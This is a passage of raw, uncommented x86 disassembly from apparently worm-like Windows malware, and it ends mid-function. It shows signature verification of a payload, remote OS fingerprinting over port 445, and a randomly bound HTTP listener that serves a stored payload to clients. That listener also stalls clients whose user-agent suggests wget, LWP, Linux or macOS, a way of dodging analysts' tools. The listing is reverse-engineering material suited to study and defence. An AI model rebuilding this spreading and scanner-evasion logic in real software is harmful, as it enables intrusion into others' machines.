loc_9AE12C: ; CODE XREF: sub_9AE0FB+36�j
rcl dword ptr [edi], 1
lea edi, [edi+4]
loop loc_9AE12C
push [ebp+arg_8]
push [ebp+Dst]
call sub_9AE0A1
test eax, eax
pop ecx
pop ecx
jl short loc_9AE15D
mov edi, [ebp+Dst]
mov esi, [ebp+arg_8]
xor eax, eax
mov ecx, 81h
loc_9AE151: ; CODE XREF: sub_9AE0FB+60�j
mov eax, [esi]
sbb [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_9AE151
loc_9AE15D: ; CODE XREF: sub_9AE0FB+47�j
mov eax, edx
shr eax, 5
mov eax, [ebx+eax*4]
mov ecx, edx
and ecx, 1Fh
shr eax, cl
test al, 1
jz short loc_9AE1B3
mov edi, [ebp+Dst]
mov esi, [ebp+arg_4]
mov ecx, 81h
xor eax, eax
loc_9AE17D: ; CODE XREF: sub_9AE0FB+8C�j
mov eax, [esi]
adc [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_9AE17D
push [ebp+arg_8]
push [ebp+Dst]
call sub_9AE0A1
test eax, eax
pop ecx
pop ecx
jl short loc_9AE1B3
mov edi, [ebp+Dst]
mov esi, [ebp+arg_8]
xor eax, eax
mov ecx, 81h
loc_9AE1A7: ; CODE XREF: sub_9AE0FB+B6�j
mov eax, [esi]
sbb [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_9AE1A7
loc_9AE1B3: ; CODE XREF: sub_9AE0FB+73�j
; sub_9AE0FB+9D�j
dec edx
jns loc_9AE122
pop edi
pop esi
loc_9AE1BC: ; CODE XREF: sub_9AE0FB+1F�j
pop ebp
retn
sub_9AE0FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AE1BE proc near ; CODE XREF: sub_9AE286+89�p
var_410 = byte ptr -410h
Dst = byte ptr -20Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Src = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 410h
push esi
push 200h ; Size
lea eax, [edi+4]
push 0 ; Val
push eax ; Dst
mov dword ptr [edi], 1
call memset
mov esi, 204h
push esi ; Size
push [ebp+Src] ; Src
lea eax, [ebp+Dst]
push eax ; Dst
call memcpy
push [ebp+arg_4]
call sub_9AE0D6
and [ebp+var_4], 0
add esp, 1Ch
test eax, eax
mov [ebp+var_8], eax
jl short loc_9AE283
push ebx
loc_9AE20A: ; CODE XREF: sub_9AE1BE+C2�j
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_4]
mov eax, ecx
shr eax, 5
mov eax, [edx+eax*4]
and ecx, 1Fh
shr eax, cl
test al, 1
jz short loc_9AE248
push [ebp+arg_8] ; int
lea eax, [ebp+var_410]
push edi ; int
push eax ; Dst
lea ebx, [ebp+Dst]
call sub_9AE0FB
push esi ; Size
lea eax, [ebp+var_410]
push eax ; Src
push edi ; Dst
call memcpy
add esp, 18h
loc_9AE248: ; CODE XREF: sub_9AE1BE+61�j
push [ebp+arg_8] ; int
lea eax, [ebp+Dst]
push eax ; int
lea eax, [ebp+var_410]
push eax ; Dst
lea ebx, [ebp+Dst]
call sub_9AE0FB
push esi ; Size
lea eax, [ebp+var_410]
push eax ; Src
mov eax, ebx
push eax ; Dst
call memcpy
add esp, 18h
inc [ebp+var_4]
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jle short loc_9AE20A
pop ebx
loc_9AE283: ; CODE XREF: sub_9AE1BE+49�j
pop esi
leave
retn
sub_9AE1BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AE286(void *Src, int, int, int)
sub_9AE286 proc near ; CODE XREF: sub_9AE331+4F�p
var_810 = byte ptr -810h
var_611 = byte ptr -611h
var_60C = byte ptr -60Ch
var_408 = byte ptr -408h
var_208 = dword ptr -208h
var_204 = dword ptr -204h
Dst = byte ptr -200h
Src = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 810h
mov eax, [ebp+arg_4]
push esi
push edi
mov esi, 200h
push esi ; Size
mov [ebp+var_204], eax
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call memset
push 204h ; Size
lea eax, [ebp+var_60C]
push 0 ; Val
push eax ; Dst
call memset
push esi ; Size
push [ebp+Src] ; Src
lea eax, [ebp+var_60C]
push eax ; Dst
call memcpy
mov eax, [ebp+arg_C]
and [ebp+var_208], 0
add esp, 24h
xor ecx, ecx
add eax, 1FFh
loc_9AE2E5: ; CODE XREF: sub_9AE286+6C�j
mov dl, [eax]
mov [ebp+ecx+var_408], dl
inc ecx
dec eax
cmp ecx, esi
jl short loc_9AE2E5
lea eax, [ebp+var_60C]
push eax
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_408]
push eax
lea edi, [ebp+var_810]
call sub_9AE1BE
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_611]
loc_9AE31F: ; CODE XREF: sub_9AE286+A5�j
mov dl, [eax]
mov edi, [ebp+arg_8]
mov [ecx+edi], dl
inc ecx
dec eax
cmp ecx, esi
jl short loc_9AE31F
pop edi
pop esi
leave
retn
sub_9AE286 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AE331(void *Src, int, int, int, int)
sub_9AE331 proc near ; CODE XREF: sub_9AD914+2A�p
Buf1 = byte ptr -400h
var_3FF = byte ptr -3FFh
Dst = byte ptr -3FEh
var_240 = byte ptr -240h
Buf2 = byte ptr -200h
var_80 = byte ptr -80h
var_40 = byte ptr -40h
Src = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 400h
push 1FEh ; Size
lea eax, [ebp+Dst]
push 0FFh ; Val
push eax ; Dst
mov [ebp+Buf1], 0
mov [ebp+var_3FF], 1
call memset
lea eax, [ebp+var_240]
push eax ; Dst
push [ebp+arg_10] ; int
push [ebp+arg_C] ; int
call sub_9B5980
push [ebp+arg_8] ; int
lea eax, [ebp+Buf2]
push eax ; int
push [ebp+arg_4] ; int
push [ebp+Src] ; Src
call sub_9AE286
push 180h ; Size
lea eax, [ebp+Buf2]
push eax ; Buf2
lea eax, [ebp+Buf1]
push eax ; Buf1
call memcmp
add esp, 34h
test eax, eax
jnz short loc_9AE3F6
push 40h ; Size
lea eax, [ebp+var_40]
push eax ; Buf2
lea eax, [ebp+var_240]
push eax ; Buf1
call memcmp
add esp, 0Ch
test eax, eax
jnz short loc_9AE3F6
push 40h
lea eax, [ebp+var_80]
push eax
push [ebp+arg_10]
push [ebp+arg_C]
call sub_9AE06F
lea eax, [ebp+var_40]
push eax ; Dst
push [ebp+arg_10] ; int
push [ebp+arg_C] ; int
call sub_9B5980
push 40h ; Size
lea eax, [ebp+var_40]
push eax ; Buf2
lea eax, [ebp+var_80]
push eax ; Buf1
call memcmp
add esp, 28h
neg eax
sbb eax, eax
inc eax
leave
retn
; ---------------------------------------------------------------------------
loc_9AE3F6: ; CODE XREF: sub_9AE331+71�j
; sub_9AE331+8A�j
xor al, al
leave
retn
sub_9AE331 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AE3FA(int, u_short netshort)
sub_9AE3FA proc near ; CODE XREF: sub_9A9B77+9�p
var_3C = dword ptr -3Ch
s = dword ptr -2Ch
var_28 = dword ptr -28h
len = dword ptr -24h
hMem = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
netshort = word ptr 0Ch
push 1Ch
push offset stru_9A4AC8
call __SEH_prolog
or ebx, 0FFFFFFFFh
mov [ebp+var_1C], ebx
mov [ebp+s], ebx
xor edi, edi
mov [ebp+hMem], edi
mov [ebp+ms_exc.disabled], edi
push 6 ; protocol
push 1 ; type
push 2 ; af
call socket
mov esi, eax
mov [ebp+s], esi
cmp esi, 0FFFFFFFFh
jz loc_9AE65D
push 4 ; int
push dword ptr [ebp+netshort] ; netshort
push [ebp+arg_0] ; int
push esi ; fd
call sub_9AB9DA
add esp, 10h
cmp eax, 0FFFFFFFFh
jz loc_9AE65D
cmp [ebp+netshort], 1BDh
jz short loc_9AE49B
push 7 ; int
push 48h ; int
push offset unk_9A4980 ; int
push esi ; s
call sub_9AB936
add esp, 10h
cmp eax, 48h
jnz loc_9AE65D
push 7 ; int
lea eax, [ebp+len]
push eax ; len
push esi ; s
call sub_9AB869
add esp, 0Ch
mov [ebp+hMem], eax
cmp eax, edi
jz loc_9AE65D
cmp [ebp+len], edi
jz loc_9AE65D
push eax ; hMem
call GlobalFree
mov [ebp+hMem], edi
loc_9AE49B: ; CODE XREF: sub_9AE3FA+57�j
push 7
pop edi
push edi ; int
push 33h ; int
push offset dword_9A49CC ; int
push esi ; s
call sub_9AB936
add esp, 10h
cmp eax, 33h
jnz loc_9AE65D
push edi ; int
lea eax, [ebp+len]
push eax ; len
push esi ; s
call sub_9AB869
add esp, 0Ch
mov [ebp+hMem], eax
test eax, eax
jz loc_9AE65D
cmp [ebp+len], 0
jz loc_9AE65D
push eax ; hMem
call GlobalFree
and [ebp+hMem], 0
push edi ; int
push 4Dh ; int
push offset dword_9A4A00 ; int
push esi ; s
call sub_9AB936
add esp, 10h
cmp eax, 4Dh
jnz loc_9AE65D
push edi ; int
lea eax, [ebp+len]
push eax ; len
push esi ; s
call sub_9AB869
add esp, 0Ch
mov [ebp+hMem], eax
test eax, eax
jz loc_9AE65D
mov eax, [ebp+len]
test eax, eax
jz loc_9AE620
loc_9AE524: ; CODE XREF: sub_9AE3FA+13E�j
dec eax
mov [ebp+var_28], eax
mov ecx, [ebp+hMem]
test eax, eax
jz loc_9AE65D
cmp byte ptr [eax+ecx-1], 0
jnz short loc_9AE524
test eax, eax
jz loc_9AE65D
loc_9AE542: ; CODE XREF: sub_9AE3FA+159�j
dec eax
mov [ebp+var_28], eax
test eax, eax
jz loc_9AE65D
cmp byte ptr [eax+ecx-1], 0
jnz short loc_9AE542
test eax, eax
jz loc_9AE65D
loc_9AE55D: ; CODE XREF: sub_9AE3FA+174�j
dec eax
mov [ebp+var_28], eax
test eax, eax
jz loc_9AE65D
cmp byte ptr [eax+ecx-1], 0
jnz short loc_9AE55D
test eax, eax
jz loc_9AE65D
lea edi, [eax+ecx]
push edi ; SubStr
call _strlwr
mov [esp+3Ch+var_3C], offset aVista ; "vista"
push edi ; Str
mov esi, strstr
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_9AE5C8
push offset aServicePack1 ; "service pack 1"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_9AE5AD
push 9
jmp loc_9AE659
; ---------------------------------------------------------------------------
loc_9AE5AD: ; CODE XREF: sub_9AE3FA+1AA�j
push offset aServicePack ; "service pack"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
mov ebx, eax
neg ebx
sbb ebx, ebx
and ebx, 2
add ebx, 8
jmp loc_9AE65A
; ---------------------------------------------------------------------------
loc_9AE5C8: ; CODE XREF: sub_9AE3FA+19C�j
push offset aWindowsServer2 ; "windows server 2003"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_9AE612
push offset aServicePack1 ; "service pack 1"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_9AE5E8
push 5
jmp short loc_9AE659
; ---------------------------------------------------------------------------
loc_9AE5E8: ; CODE XREF: sub_9AE3FA+1E8�j
push offset aServicePack2 ; "service pack 2"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_9AE5FA
push 6
jmp short loc_9AE659
; ---------------------------------------------------------------------------
loc_9AE5FA: ; CODE XREF: sub_9AE3FA+1FA�j
push offset aServicePack ; "service pack"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
mov ebx, eax
neg ebx
sbb ebx, ebx
and ebx, 3
add ebx, 4
jmp short loc_9AE65A
; ---------------------------------------------------------------------------
loc_9AE612: ; CODE XREF: sub_9AE3FA+1DA�j
push offset aWindows5_1 ; "windows 5.1"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_9AE624
loc_9AE620: ; CODE XREF: sub_9AE3FA+124�j
push 3
jmp short loc_9AE659
; ---------------------------------------------------------------------------
loc_9AE624: ; CODE XREF: sub_9AE3FA+224�j
push offset aWindows5_0 ; "windows 5.0"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_9AE636
push 2
jmp short loc_9AE659
; ---------------------------------------------------------------------------
loc_9AE636: ; CODE XREF: sub_9AE3FA+236�j
push offset aWindows4_0 ; "windows 4.0"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_9AE649
xor ebx, ebx
inc ebx
jmp short loc_9AE65A
; ---------------------------------------------------------------------------
loc_9AE649: ; CODE XREF: sub_9AE3FA+248�j
push offset aUnix ; "unix"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_9AE65D
push 0Bh
loc_9AE659: ; CODE XREF: sub_9AE3FA+1AE�j
; sub_9AE3FA+1EC�j ...
pop ebx
loc_9AE65A: ; CODE XREF: sub_9AE3FA+1C9�j
; sub_9AE3FA+216�j ...
mov [ebp+var_1C], ebx
loc_9AE65D: ; CODE XREF: sub_9AE3FA+31�j
; sub_9AE3FA+4B�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_9AE671
; ---------------------------------------------------------------------------
loc_9AE663: ; DATA XREF: .text:stru_9A4AC8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AE667: ; DATA XREF: .text:stru_9A4AC8�o
mov esp, [ebp+ms_exc.old_esp]
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov ebx, [ebp+var_1C]
loc_9AE671: ; CODE XREF: sub_9AE3FA+267�j
cmp [ebp+hMem], 0
jz short loc_9AE680
push [ebp+hMem] ; hMem
call GlobalFree
loc_9AE680: ; CODE XREF: sub_9AE3FA+27B�j
cmp [ebp+s], 0FFFFFFFFh
jz short loc_9AE69A
push 1 ; how
push [ebp+s] ; s
call shutdown
push [ebp+s] ; s
call closesocket
loc_9AE69A: ; CODE XREF: sub_9AE3FA+28A�j
mov eax, ebx
call __SEH_epilog
retn
sub_9AE3FA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_9AE6A2(LPVOID)
sub_9AE6A2 proc near ; DATA XREF: sub_9AEAF7+116�o
Buf2 = byte ptr -29Ch
var_9D = byte ptr -9Dh
Str = byte ptr -9Ch
var_5D = byte ptr -5Dh
name = sockaddr ptr -5Ch
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
netlong = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
hMem = dword ptr -2Ch
var_28 = dword ptr -28h
len = dword ptr -24h
s = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 28Ch
push offset stru_9A4B98
call __SEH_prolog
mov eax, [ebp+arg_0]
mov [ebp+var_44], eax
mov esi, [eax]
mov [ebp+s], esi
mov eax, [eax+4]
mov [ebp+netlong], eax
xor ebx, ebx
mov [ebp+var_38], ebx
mov [ebp+hMem], ebx
mov [ebp+var_1C], ebx
mov [ebp+len], 10h
call sub_9AB510
mov [ebp+ms_exc.disabled], ebx
lea eax, [ebp+len]
push eax ; namelen
lea eax, [ebp+name]
push eax ; name
push esi ; s
call getsockname
cmp eax, 0FFFFFFFFh
jz short loc_9AE6F6
mov eax, dword ptr [ebp+name.sa_data+2]
mov [ebp+var_38], eax
loc_9AE6F6: ; CODE XREF: sub_9AE6A2+4C�j
push 7 ; int
lea eax, [ebp+len]
push eax ; len
push esi ; s
call sub_9AB869
add esp, 0Ch
mov edi, eax
mov [ebp+hMem], edi
cmp edi, ebx
jz loc_9AE9D8
push offset dword_9BA28C
mov esi, offset aGetSHttp ; "get /%s http/"
push esi ; Format
push 200h ; Count
lea eax, [ebp+Buf2]
push eax ; Dest
mov ebx, _snprintf
call ebx ; _snprintf
mov [ebp+var_9D], 0
push offset dword_9BA298
push esi ; Format
push 40h ; Count
lea eax, [ebp+Str]
push eax ; Dest
call ebx ; _snprintf
add esp, 20h
mov [ebp+var_5D], 0
mov eax, [ebp+len]
test eax, eax
jz short loc_9AE764
mov byte ptr [eax+edi-1], 0
push edi ; Str
call _strlwr
pop ecx
loc_9AE764: ; CODE XREF: sub_9AE6A2+B3�j
lea eax, [ebp+Buf2]
push eax ; Str
call strlen
pop ecx
cmp [ebp+len], eax
jle short loc_9AE7A0
lea eax, [ebp+Buf2]
push eax ; Str
call strlen
push eax ; Size
lea eax, [ebp+Buf2]
push eax ; Buf2
push edi ; Buf1
call memcmp
add esp, 10h
test eax, eax
jnz short loc_9AE7A0
mov [ebp+var_1C], 1
jmp short loc_9AE7DA
; ---------------------------------------------------------------------------
loc_9AE7A0: ; CODE XREF: sub_9AE6A2+D2�j
; sub_9AE6A2+F3�j
lea eax, [ebp+Str]
push eax ; Str
call strlen
pop ecx
cmp [ebp+len], eax
jle short loc_9AE7DA
lea eax, [ebp+Str]
push eax ; Str
call strlen
push eax ; Size
lea eax, [ebp+Str]
push eax ; Buf2
push edi ; Buf1
call memcmp
add esp, 10h
test eax, eax
jnz short loc_9AE7DA
mov [ebp+var_1C], 2
loc_9AE7DA: ; CODE XREF: sub_9AE6A2+FC�j
; sub_9AE6A2+10E�j ...
cmp [ebp+var_1C], 0
jz loc_9AE9D8
xor esi, esi
inc esi
mov [ebp+var_28], esi
push [ebp+netlong] ; netlong
call sub_9A8DB4
pop ecx
test eax, eax
jnz loc_9AE88E
cmp [ebp+var_1C], esi
jnz loc_9AE88A
push offset asc_9A4B80 ; "\r\n\r"
push edi ; Str
mov esi, strstr
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_9AE88A
push offset aUserAgent ; "\r\nuser-agent:"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
mov edi, eax
mov [ebp+var_48], edi
test edi, edi
jz short loc_9AE88E
push offset asc_9A4228 ; "\r\n"
lea eax, [edi+2]
push eax ; Str
call esi ; strstr
pop ecx
pop ecx
mov [ebp+var_4C], eax
test eax, eax
jz short loc_9AE88E
mov byte ptr [eax], 0
push offset aWindowsNt5_ ; "windows nt 5."
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_9AE88E
push offset aWget ; "wget"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jnz short loc_9AE88E
push offset aLwp ; "lwp::"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jnz short loc_9AE88E
push offset aLinux ; "linux"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jnz short loc_9AE88E
push offset aMacintosh ; "macintosh"
push [ebp+hMem] ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jnz short loc_9AE88E
loc_9AE88A: ; CODE XREF: sub_9AE6A2+15C�j
; sub_9AE6A2+174�j
and [ebp+var_28], 0
loc_9AE88E: ; CODE XREF: sub_9AE6A2+153�j
; sub_9AE6A2+187�j ...
xor eax, eax
cmp [ebp+var_28], eax
jnz short loc_9AE8A9
mov ecx, ds:lpBuffer
mov [ebp+var_3C], ecx
mov esi, ds:nNumberOfBytesToWrite
mov [ebp+var_34], esi
jmp short loc_9AE8AC
; ---------------------------------------------------------------------------
loc_9AE8A9: ; CODE XREF: sub_9AE6A2+1F1�j
mov esi, [ebp+var_34]
loc_9AE8AC: ; CODE XREF: sub_9AE6A2+205�j
cmp [ebp+var_28], eax
jz short loc_9AE8CF
mov [ebp+var_1C], 4
mov [ebp+var_3C], eax
call rand
mov esi, eax
add esi, 64h
imul esi, 3E8h
mov [ebp+var_34], esi
loc_9AE8CF: ; CODE XREF: sub_9AE6A2+20D�j
mov edi, rand
call edi ; rand
and eax, 3
push ds:off_9B9D98[eax*4]
push esi
push offset aHttp1_0200OkPr ; "HTTP/1.0 200 OK\r\nPragma: no-cache\r\nCont"...
push 200h ; Count
lea eax, [ebp+Buf2]
push eax ; Dest
call ebx ; _snprintf
add esp, 14h
mov [ebp+var_9D], 0
and [ebp+var_30], 0
push 7 ; int
lea eax, [ebp+Buf2]
push eax ; Str
call strlen
pop ecx
push eax ; int
lea eax, [ebp+Buf2]
push eax ; int
push [ebp+s] ; s
call sub_9AB936
mov ebx, eax
lea eax, [ebp+Buf2]
push eax ; Str
call strlen
add esp, 14h
cmp eax, ebx
jnz short loc_9AE99F
cmp [ebp+var_1C], 4
jz short loc_9AE95B
push 7 ; int
push esi ; int
push [ebp+var_3C] ; int
push [ebp+s] ; s
call sub_9AB936
add esp, 10h
cmp esi, eax
jnz short loc_9AE99F
mov [ebp+var_30], 1
jmp short loc_9AE99F
; ---------------------------------------------------------------------------
loc_9AE95B: ; CODE XREF: sub_9AE6A2+299�j
mov esi, 1FFh
loc_9AE960: ; CODE XREF: sub_9AE6A2+2FB�j
push esi
lea eax, [ebp+Buf2]
push eax
call sub_9AB647
pop ecx
pop ecx
call edi ; rand
cdq
mov ecx, 1388h
idiv ecx
add edx, 6A4h
push edx ; dwMilliseconds
call Sleep
push 7 ; int
push esi ; int
lea eax, [ebp+Buf2]
push eax ; int
push [ebp+s] ; s
call sub_9AB936
add esp, 10h
cmp eax, esi
jz short loc_9AE960
loc_9AE99F: ; CODE XREF: sub_9AE6A2+293�j
; sub_9AE6A2+2AE�j ...
cmp [ebp+var_30], 0
jz short loc_9AE9D8
cmp [ebp+var_1C], 1
jnz short loc_9AE9D8
push offset dword_9B9F38 ; lpAddend
call InterlockedIncrement
push ds:dword_9B9F38 ; Data
call sub_9A81C3
push [ebp+var_38]
push [ebp+netlong]
call sub_9AC911
add esp, 0Ch
jmp short loc_9AE9D8
; ---------------------------------------------------------------------------
loc_9AE9D1: ; DATA XREF: .text:stru_9A4B98�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AE9D5: ; DATA XREF: .text:stru_9A4B98�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AE9D8: ; CODE XREF: sub_9AE6A2+6A�j
; sub_9AE6A2+13C�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
cmp [ebp+hMem], 0
jz short loc_9AE9EB
push [ebp+hMem] ; hMem
call GlobalFree
loc_9AE9EB: ; CODE XREF: sub_9AE6A2+33E�j
push 1 ; how
push [ebp+s] ; s
call shutdown
push [ebp+s] ; s
call closesocket
push [ebp+var_44] ; hMem
call GlobalFree
xor eax, eax
call __SEH_epilog
retn 4
sub_9AE6A2 endp
; =============== S U B R O U T I N E =======================================
sub_9AEA12 proc near ; CODE XREF: sub_9AEAF7+62�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
sub esp, 18h
push ebx
push ebp
push edi
xor edi, edi
push 10h ; Size
lea eax, [esp+28h+Dst]
push edi ; Val
push eax ; Dst
mov [esp+30h+var_14], edi
call memset
mov [esp+30h+Dst], 2
mov [esp+30h+var_C], edi
call sub_9AB343
push eax ; Seed
call srand
mov ebx, Sleep
add esp, 10h
mov [esp+24h+var_18], edi
mov ebp, 1388h
loc_9AEA54: ; CODE XREF: sub_9AEA12+C0�j
call rand
cdq
mov ecx, 2310h
idiv ecx
mov edi, edx
add edi, 400h
push edi
call sub_9A8FED
test eax, eax
pop ecx
jnz short loc_9AEA8C
cmp ds:dword_9BA2A8, eax
jnz short loc_9AEA8F
call sub_9A8CAF
mov ds:dword_9BA2A8, 1
loc_9AEA8C: ; CODE XREF: sub_9AEA12+61�j
push ebp ; dwMilliseconds
call ebx ; Sleep
loc_9AEA8F: ; CODE XREF: sub_9AEA12+69�j
push 6 ; protocol
push 1 ; type
push 2 ; af
call socket
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_9AEADE
push edi ; netshort
call ntohs
mov [esp+24h+var_E], ax
push 10h ; namelen
lea eax, [esp+28h+Dst]
push eax ; name
push dword ptr [esi] ; s
call bind
test eax, eax
jz short loc_9AEAD6
push dword ptr [esi] ; s
call closesocket
inc [esp+24h+var_18]
cmp [esp+24h+var_18], 0Ah
jl short loc_9AEA54
jmp short loc_9AEADE
; ---------------------------------------------------------------------------
loc_9AEAD6: ; CODE XREF: sub_9AEA12+AD�j
mov [esp+24h+var_14], 1
loc_9AEADE: ; CODE XREF: sub_9AEA12+8E�j
; sub_9AEA12+C2�j
call sub_9AB510
mov eax, [esp+24h+var_14]
movzx ecx, di
neg eax
pop edi
sbb eax, eax
pop ebp
and eax, ecx
pop ebx
add esp, 18h
retn
sub_9AEA12 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_9AEAF7(LPVOID)
sub_9AEAF7 proc near ; DATA XREF: sub_9AEC54+18�o
readfds = fd_set ptr -220h
exceptfds = fd_set ptr -11Ch
addr = sockaddr ptr -18h
ThreadId = dword ptr -8
addrlen = dword ptr -4
push ebp
mov ebp, esp
sub esp, 220h
push ebx
call sub_9AB510
xor ebx, ebx
cmp ds:lpBuffer, ebx
jz loc_9AEC4C
cmp ds:nNumberOfBytesToWrite, ebx
jz loc_9AEC4C
push esi
mov esi, rand
call esi ; rand
push 5
pop ecx
cdq
idiv ecx
add edx, 4
push edx
push offset dword_9BA28C
call sub_9AB647
call esi ; rand
push 5
pop ecx
cdq
idiv ecx
add edx, 4
push edx
push offset dword_9BA298
call sub_9AB647
add esp, 10h
lea esi, [ebp+addrlen]
call sub_9AEA12
mov esi, eax
cmp si, bx
jz loc_9AEC3A
push edi
mov edi, [ebp+addrlen]
push 32h ; backlog
push edi ; s
call listen
test eax, eax
jnz loc_9AEC32
movzx eax, si
push eax ; Value
push offset dword_9BA2A4 ; Target
mov [ebp+addrlen], 10h
call InterlockedExchange
loc_9AEB94: ; CODE XREF: sub_9AEAF7+F8�j
; sub_9AEAF7+12A�j ...
xor eax, eax
inc eax
push ebx ; timeout
mov [ebp+readfds.fd_count], eax
mov [ebp+exceptfds.fd_count], eax
lea eax, [ebp+exceptfds]
push eax ; exceptfds
push ebx ; writefds
lea eax, [ebp+readfds]
push eax ; readfds
push ebx ; nfds
mov [ebp+readfds.fd_array], edi
mov [ebp+exceptfds.fd_array], edi
call select
test eax, eax
jle short loc_9AEC32
lea eax, [ebp+exceptfds]
push eax ; fd_set *
push edi ; fd
call __WSAFDIsSet
test eax, eax
jnz short loc_9AEC32
lea eax, [ebp+addrlen]
push eax ; addrlen
lea eax, [ebp+addr]
push eax ; addr
push edi ; s
call accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_9AEB94
push 8 ; dwBytes
push 40h ; uFlags
call GlobalAlloc
cmp eax, ebx
jz short loc_9AEC26
mov [eax], esi
mov ecx, dword ptr [ebp+addr.sa_data+2]
mov [eax+4], ecx
lea ecx, [ebp+ThreadId]
push ecx ; lpThreadId
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_9AE6A2 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread
push eax ; hObject
call CloseHandle
jmp loc_9AEB94
; ---------------------------------------------------------------------------
loc_9AEC26: ; CODE XREF: sub_9AEAF7+106�j
push esi ; s
call closesocket
jmp loc_9AEB94
; ---------------------------------------------------------------------------
loc_9AEC32: ; CODE XREF: sub_9AEAF7+81�j
; sub_9AEAF7+D1�j ...
push edi ; s
call closesocket
pop edi
loc_9AEC3A: ; CODE XREF: sub_9AEAF7+6C�j
push ebx ; Value
push offset dword_9BA2A4 ; Target
call InterlockedExchange
push 2
pop eax
pop esi
jmp short loc_9AEC4F
; ---------------------------------------------------------------------------
loc_9AEC4C: ; CODE XREF: sub_9AEAF7+17�j
; sub_9AEAF7+23�j
xor eax, eax
inc eax
loc_9AEC4F: ; CODE XREF: sub_9AEAF7+153�j
pop ebx
leave
retn 4
sub_9AEAF7 endp
; =============== S U B R O U T I N E =======================================
sub_9AEC54 proc near ; CODE XREF: StartAddress+1BC�p
ThreadId = dword ptr -4
push ecx
push esi
push edi
xor edi, edi
push edi ; Value
push offset dword_9BA2A4 ; Target
call InterlockedExchange
lea eax, [esp+0Ch+ThreadId]
push eax ; lpThreadId
push edi ; dwCreationFlags
push edi ; lpParameter
push offset sub_9AEAF7 ; lpStartAddress
push edi ; dwStackSize
push edi ; lpThreadAttributes
call CreateThread
push eax ; hObject
call CloseHandle
xor esi, esi
loc_9AEC82: ; CODE XREF: sub_9AEC54+45�j
cmp ds:dword_9BA2A4, edi
jnz short loc_9AEC9B
push 1F4h ; dwMilliseconds
call Sleep
inc esi
cmp esi, 64h
jl short loc_9AEC82
loc_9AEC9B: ; CODE XREF: sub_9AEC54+34�j
mov eax, ds:dword_9BA2A4
pop edi
pop esi
pop ecx
retn
sub_9AEC54 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AECA4 proc near ; CODE XREF: sub_9ACABE+19E�p
; sub_9ACABE+2A4�p
szUrl = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 80h
mov eax, ds:dword_9BA2A4
push edi
xor edi, edi
cmp word ptr [ebp+arg_4], di
jnz short loc_9AECC0
cmp ax, di
jz short loc_9AED33
